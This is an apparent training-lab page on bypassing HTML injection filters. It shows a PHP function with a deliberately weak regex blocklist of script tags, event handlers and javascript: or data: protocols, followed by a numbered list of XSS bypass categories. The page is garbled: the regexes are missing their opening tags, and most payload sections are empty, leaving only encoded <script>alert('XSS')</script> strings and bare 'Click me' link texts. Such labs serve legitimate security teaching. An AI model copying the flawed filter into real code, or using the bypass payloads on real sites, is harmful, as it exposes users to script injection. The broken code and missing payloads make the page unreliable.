Lab 4: Advanced HTML Injection Techniques

Complex HTML injection bypass techniques

Difficulty: High

Lab Overview

This lab demonstrates advanced HTML injection techniques used to bypass modern security filters and protections. These techniques include obfuscation, encoding, alternative tags, and other sophisticated bypass methods.

Objective: Use advanced techniques to bypass security filters and achieve HTML injection.

Advanced Vulnerable Code 
// Vulnerable: Advanced filters that can be bypassed
function process_html_input_advanced($input) {
    $dangerous_patterns = [
        '/]*>.*?<\/script>/is',
        '/]*>.*?<\/iframe>/is',
        '/]*>.*?<\/object>/is',
        '/]*>.*?<\/embed>/is',
        '/]*>.*?<\/form>/is',
        '/onload\s*=/i',
        '/onerror\s*=/i',
        '/onclick\s*=/i',
        '/javascript:/i',
        '/data:/i',
        '/vbscript:/i'
    ];
    
    // Advanced filter check (can be bypassed)
    $is_dangerous = false;
    foreach ($dangerous_patterns as $pattern) {
        if (preg_match($pattern, $input)) {
            $is_dangerous = true;
            break;
        }
    }
    
    // Still vulnerable to advanced bypass techniques
    if (!$is_dangerous) {
        return $input;
    }
}
Advanced HTML Injection
Advanced Filters

The following patterns are filtered using regex:

  • Tags: script, iframe, object, embed, form, input, button, link, meta, style
  • Attributes: onload, onerror, onclick, onmouseover, onfocus, onchange, onsubmit, onkeypress, onkeydown, onkeyup
  • Protocols: javascript:, data:, vbscript:, file:, ftp:, gopher:
Safe HTML Tags

These tags should work:

  • <h1>Hello</h1> - Heading
  • <p>Paragraph</p> - Paragraph
  • <div>Container</div> - Container
  • <span>Inline</span> - Inline
Vulnerability Details
  • Type: Advanced HTML Injection Techniques
  • Severity: Critical
  • Method: POST
  • Issue: Advanced filters can be bypassed
Advanced Bypass Techniques
  • Obfuscation: Hide patterns and tags
  • Encoding: Use encoded characters
  • Alternative Tags: Use unfiltered tags
  • String Manipulation: Build HTML dynamically
Advanced HTML Injection Bypass Payloads

Use these advanced techniques to bypass security filters:

1. Character Encoding Bypass:
<script>alert('XSS')</script> %3Cscript%3Ealert('XSS')%3C/script%3E <script>alert('XSS')</script> <script>alert('XSS')</script>
2. Case Variation Bypass:
3. Alternative Tags Bypass:
4. Attribute Bypass:
5. Protocol Bypass:
Click me Click me Click me Click me Click me
6. String Concatenation Bypass:
7. Alternative Attributes Bypass:
8. Event Handler Bypass:
9. CSS Injection Bypass:
10. Advanced Bypass Techniques:
11. Unicode and Encoding Bypass:
<script>alert('XSS')</script> %3Cscript%3Ealert('XSS')%3C/script%3E <script>alert('XSS')</script> <script>alert('XSS')</script>
12. Alternative Event Handlers:
13. Data URI Bypass: